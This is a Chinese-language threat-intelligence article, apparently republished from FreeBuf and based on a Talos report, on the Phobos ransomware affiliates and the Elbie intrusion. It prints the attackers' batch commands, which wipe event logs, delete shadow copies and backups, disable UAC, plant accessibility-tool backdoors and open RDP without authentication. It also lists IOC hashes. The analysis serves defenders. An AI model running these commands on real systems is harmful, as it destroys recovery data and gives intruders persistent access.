透视 Phobos 勒索软件的组织架构与攻击行动

Phobos 勒索软件是 Dharma/Crysis 勒索软件的变种，自从 2019 年被发现后攻击活动一直很活跃，但样本的迭代升级并不多。

研究人员根据 VirusTotal 中的样本量，确定了 Phobos 勒索软件家族中最多产的五个变种。区分样本文件的唯一特征是恶意软件构建工具的配置，不同变种的配置文件也存在差别。样本文件都使用相同的源码进行编译，并且会避免加密其他 Phobos 组织已加密的文件。

如下所示，8Base 勒索软件团伙部署的 Phobos 样本文件中包含不加密其的其他 Phobos 变种列表。所有样本文件中的配置，都会将特定的组织名称添加到列表的开头。

跳过文件扩展名列表

一旦提取了样本文件的配置并且确认为 Phobos 变种，将攻击活动相关的唯一 ID 来统计最活跃的 Phobos 附属机构。

• Eking：从 2019 年一直保持活跃，通常针对亚太地区发起攻击。

• Eight：被认为是运营 8Base 的同一攻击组织的旧攻击行动。

• Elbie：从 2022 年一直保持活跃，也是针对亚太地区发起攻击。

• Devos：自 2019 年来一直很活跃，但攻击手法变化不大。

• Faust：自 2022 年来一直很活跃，但不针对特定地区进行攻击。

变种样本文件间的区别在于加密文件的文件扩展名中的电子邮件地址，以及配置中的勒索信息，其余所有配置都相同。分析过的所有 Phobos 变种中使用的文件扩展名都遵循相同的结构，ID 为受害者的驱动器序列号，下一个数字是当前攻击行动的标识符，最后列出联系攻击者的电子邮件地址，以及变种的特定扩展名。

	


.id[<>-3253].[musonn@airmail[.]cc].eking




这些变种文件在过去几年中使用了数百个不同的电子邮件地址，如下所示：


变种文件使用的电子邮件计数
攻击者通常使用免费或者安全的电子邮件服务提供商，如下所示：


服务提供商统计
某些情况下，附属机构还会使用 ICQ、Jabber 与 QQ 等即时通讯服务进行运营。各个攻击者的选择如下所示：


通讯服务提供商
Devos 使用 QQ，而 Eight 使用 ICQ，甚至还有攻击者选择使用安全邮件服务 Proton Mail。这也可以看出，Phobos 拥有多个分散的附属机构，通过勒索软件即服务（RaaS）进行运营。





Phobos攻击手段















2023 年初，分析人员发现 Elbie 的攻击行动。攻击者入侵了 Exchange 服务器，然后通过横向平移入侵了备份服务器、数据库服务器与虚拟机管理服务器。攻击者并未将勒索软件同时部署到全部机器，而是只针对特定的目标单独部署勒索软件。Phobos 的附属机构通常会追寻受害者网络中的高价值服务器，以此增加勒索成功的概率。
成功入侵 Exchange 服务器后，攻击者在失陷主机的桌面创建一个目录，并且释放以下各种工具：


Process Hacker：进程分析工具，攻击者滥用其内核驱动程序删除文件、删除服务、终止进程


Automim：自动收集凭据，包含 LaZagne 与 Mimikatz


IObit File Unlocker：删除其他应用程序打开的锁定文件的工具，扩大加密文件的覆盖面


Nirsoft Password Recovery Toolkit：提取浏览器与电子邮件客户端等常见应用程序密码的工具


NS.exe：扫描网络中开放服务并进行横向平移的程序


Angry IP Scanner：扫描开放服务并识别机器网络信息的工具


除此之外，还有一些批处理文件。一个批处理文件可以清除失陷主机上的 Windows 事件日志，最大程度上消除取证痕迹增大分析困难。


	


FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")

（向右滑动，查看更多）
另一个批处理脚本负责删除卷影副本，使 Phobos 感染后的恢复变得更困难。


	

	

	

	

	

	


vssadmin delete shadows /all /quietwmic shadowcopy deletebcdedit /set {default} bootstatuspolicy ignoreallfailuresbcdedit /set {default} recoveryenabled nowbadmin delete catalog -quietexit

（向右滑动，查看更多）
以上脚本也包含在 Phobos 的配置文件中，在开始文件加密前会被保存为 .bat 文件执行。
此外也有处理 Windos 注册表的批处理文件，通过 Windows 辅助功能生成系统级命令提示符，绕过身份验证。攻击者将其当作持久化机制，支持攻击者后期通过 RDP 重新获取对系统的完全控制。该脚本通过设置注册表项禁用用户账户控制（UAC）：


	


REG ADD "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" /v EnableLUA /t REG_DWORD /d 0 /f

（向右滑动，查看更多）
接下来，脚本执行使攻击者通过 Windows 登录屏幕调用辅助功能执行提权后的 Shell 命令。每当启动这些应用程序时，指定的调试应用程序都会以高权限启动。


	

	

	

	

	

	

	


REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /f /v Debugger /t REG_SZ /d "%windir%system32cmd.exe"

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsMagnify.exe" /f /v Debugger /t REG_SZ /d "%windir%system32cmd.exe"

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsHelpPane.exe" /f /v Debugger /t REG_SZ /d "%windir%system32cmd.exe"

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsutilman.exe" /f /v Debugger /t REG_SZ /d "%windir%system32cmd.exe"

（向右滑动，查看更多）
最后，该脚本启动 RDP 并禁用网络身份验证的各项注册表：


	

	

	

	

	

	

	


REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

（向右滑动，查看更多）
攻击者使用的另一个脚本负责在失陷主机上进行以下服务配置更改：


	

	

	

	

	

	

	

	


sc config Dnscache start= autonet start Dnscachesc config SSDPSRV start= autonet start SSDPSRVsc config FDResPub start= autonet start FDResPubsc config upnphost start= autonet start upnphost




执行以下命令在失陷主机上启用文件共享：


	


dism /online /enable-feature /featurename:File-Services /NoRestart

（向右滑动，查看更多）
攻击者尝试卸载失陷主机上的安全防护软件，最大限度地减少对攻击过程中的检测。防御手段被禁用并且启动持久化后，攻击者就会部署 Phobos 勒索软件对文件进行加密。勒索信息 info.hta 会被释放到用户桌面上，其中包含有关如何联系攻击者的详细信息。


勒索信息





背后的附属机构















通过对 Phobos 攻击行动与恶意样本文件的分析，研究人员对该勒索软件的附属机构与开发人员有了更多的了解。
VirusTotal 上的每个 Phobos 变种，都至少与十几个电子邮件地址有关，甚至有的还拥有近 200 个不同域名的电子邮件地址。攻击者如此频繁更改电子邮件地址的情况并不常见，额外付出的时间和精力成本是巨大的。有些勒索软件团伙只使用几个电子邮件地址也很成功，例如 8Base 只使用一个电子邮件地址 support@rexsdata[.]pro。
分析人员认为，Phobos 可能受到控制勒索软件解密私钥的中央机构的紧密控制。每个 Phobos 加密的文件都会生成一个随机的 AES 密钥，再使用配置文件中的 RSA 公钥对密钥与元数据进行加密，再将该数据保存到加密文件末尾。所以，解密该文件需要与 RSA 公钥对应的私钥。
不同样本文件中的 RSA 公钥都相同，这意味着只有一个解密私钥。分析人员认为，只有一个攻击者控制着私钥。攻击者通过这种方式未附属机构提供解密服务，以便获取勒索赎金的分成。


解密工具
分析人员也确实发现了解密工具，声称能够解密 Elbie 变种的样本文件。但其实，这些解密工具并不能解密加密文件。第一部分是包含 base64 编码的加密数据块文件，推测是 RSA 私钥。而第二部分是用于解密该数据块的密码。如果能找到这两部分数据，付费解密过的受害者给出或者被泄露的情况下，RSA 的私钥有可能被恢复出来。
勒索软件不加密的文件列表十分详细，也支持了分析人员的以上推论。Phobos 会避免加密已经被其他附属机构加密的文件。分析人员发现，许多 Phobos 样本文件中的列表会不断替换为攻击中出现的最新文件。最可能的情况就是 Phobos 背后有一个运营的中央机构，负责跟踪各个附属机构对样本文件的使用，避免各个附属机构干扰彼此的攻击行动。





IOC
















58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6 f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c 32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3 2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66 fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6 a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2







https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/






原文始发于微信公众号（FreeBuf）：透视 Phobos 勒索软件的组织架构与攻击行动